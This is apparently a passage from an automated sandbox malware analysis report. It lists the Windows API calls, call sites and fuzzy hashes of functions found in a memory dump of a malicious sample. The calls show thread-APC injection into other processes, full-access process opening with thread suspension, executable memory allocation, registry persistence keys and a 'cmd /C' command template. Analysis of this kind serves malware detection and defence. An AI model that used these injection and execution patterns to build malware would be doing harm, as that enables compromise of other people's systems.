  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
